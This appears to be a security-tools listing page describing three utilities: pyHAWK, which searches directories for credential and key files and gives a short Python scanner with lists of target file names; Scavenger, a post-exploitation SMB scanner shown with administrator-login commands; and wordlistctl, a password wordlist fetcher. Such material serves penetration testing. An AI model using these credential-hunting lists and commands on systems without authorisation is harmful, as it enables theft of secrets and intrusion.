    Searches the directory of choice for interesting files, such as database files and files with passwords stored in them.

    Features
    • Scans a directory for interesting file types
    • Outputs them to the screen
    • Supports many file types

    Installation Instructions
    The installation is easy. Git clone the repo and run it with Python 2.
    git clone https://github.com/MetaChar/pyHAWK
    python2 main.py

    Usage
    To set a Directory use -d or --directory
    python2 main.py -d <directory>
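    The scan itself boils down to walking the directory tree and matching file extensions and names against the lists below; a minimal sketch (illustrative only, with a small subset of those lists):

    # Walk a directory and flag files whose extension or name looks interesting.
    import os

    INTERESTING_EXTS = {'.pem', '.p12', '.sqlite', '.kwallet', '.rdp', '.ovpn'}
    INTERESTING_NAMES = {'credentials.xml', 'database.yml', 'passwords.txt'}

    def scan(directory):
        for root, _, files in os.walk(directory):
            for name in files:
                if name in INTERESTING_NAMES or os.path.splitext(name)[1] in INTERESTING_EXTS:
                    print(os.path.join(root, name))

    scan('.')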

    File Extensions

    Cryptography
    • .pem
    • .pkcs12
    • .p12
    • .pfx
    • .asc
    • .jks
    • .keychain

    Password Files
    • .agilekeychain
    • .kwallet
    • .bek
    • .tpm
    • .psafe3

    Database Files
    • .sdf
    • .sqlite
    • .fve
    • .pcap
    • .gnucash
    • .dayone
    • .mdf

    Misc Files
    • .log

    Config Files
    • .cscfg
    • .rdp
    • .tblk
    • .ovpn

    File Names

    Password Files
    • credentials.xml
    • robomongo.json
    • filezilla.xml
    • recentservers.xml
    • ventrilo_srv.ini
    • terraform.tfvars
    • secret_token.rb
    • carrierwave.rb
    • omniauth.rb
    • settings.py
    • database.yml

    Database Files
    • journal.txt
    • Favorites.plist

    Misc Files
    • root.txt
    • users.txt
    • passwords.txt
    • login.txt

    Config Files
    • jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml
    • LocalSettings.php
    • configuration.user.xpl
    • knife.rb

    Inspiration
    Inspired by Ice3man543's hawkeye; check it out here: https://github.com/Ice3man543/hawkeye


    Scavenger - Is A Multi-Threaded Post-Exploitation Scanning Tool For Scavenging Systems, Finding Most Frequently Used Files And Folders As Well As "Interesting" Files Containing Sensitive Information


    scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding the most frequently used files and folders as well as "interesting" files containing sensitive information.

    Problem Definition:
    Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests: the issue of having too much access to too many systems with limited days for testing.

    Requirements:

    Examples:
    $ python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
    $ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite

    Blog Post:
    Link to Trustwave SpiderLabs Blog

    Acknowledgements - Powered and Inspired by:


    Wordlistctl - Fetch, Install And Search Wordlist Archives From Websites And Torrent Peers


    Script to fetch, install, update and search wordlist archives from websites offering wordlists, with more than 1800 wordlists available.
    In the latest version of BlackArch Linux it has been added to the /usr/share/wordlists/ directory.

    Installation
    pacman -S wordlistctl

    Usage
    [ sepehrdad@blackarch-dev ~/blackarch/repos/wordlistctl ]$ wordlistctl -H
    --==[ wordlistctl by blackarch.org ]==--

    usage:

    wordlistctl -f <arg> [options] | -s <arg> [options] | -S <arg> | <misc>

    options:

    -f <num> - download chosen wordlist - ? to list wordlists with id
    -d <dir> - wordlists base directory (default: /usr/share/wordlists)
    -c <num> - change wordlists category - ? to list wordlists categories
    -s <regex> - wordlist to search using <regex> in base directory
    -S <regex> - wordlist to search using <regex> in sites
    -h - prefer http
    -X - decompress wordlist
    -F <str> - list wordlists in categories given
    -r - remove compressed file after decompression
    -t <num> - max download threads (default: 10)

    misc:

    -U - update config files
    -V - print version of wordlistctl and exit
    -H - print this help and exit

    example:

    # download and decompress all wordlists and remove archive
    $ wordlistctl -f 0 -Xr

    # download all wordlists in username category
    $ wordlistctl -f 0 -c 0

    # list all wordlists in password category with id
    $ wordlistctl -f ? -c 1

    # download and decompress all wordlists in misc category
    $ wordlistctl -f 0 -c 4 -X

    # download all wordlists in filename category using 20 threads
    $ wordlistctl -c 3 -f 0 -t 20

    # download wordlist with id 2 to "~/wordlists" directory using http
    $ wordlistctl -f 2 -d ~/wordlists -h
    # print wordlists in username and password categories
    $ wordlistctl -F username,password

    Get Involved
    You can get in touch with the BlackArch Linux team. Just check out the following:
    Please, send us pull requests!
    Web: https://www.blackarch.org/
    Mail: team@blackarch.org
    IRC: irc://irc.freenode.net/blackarch

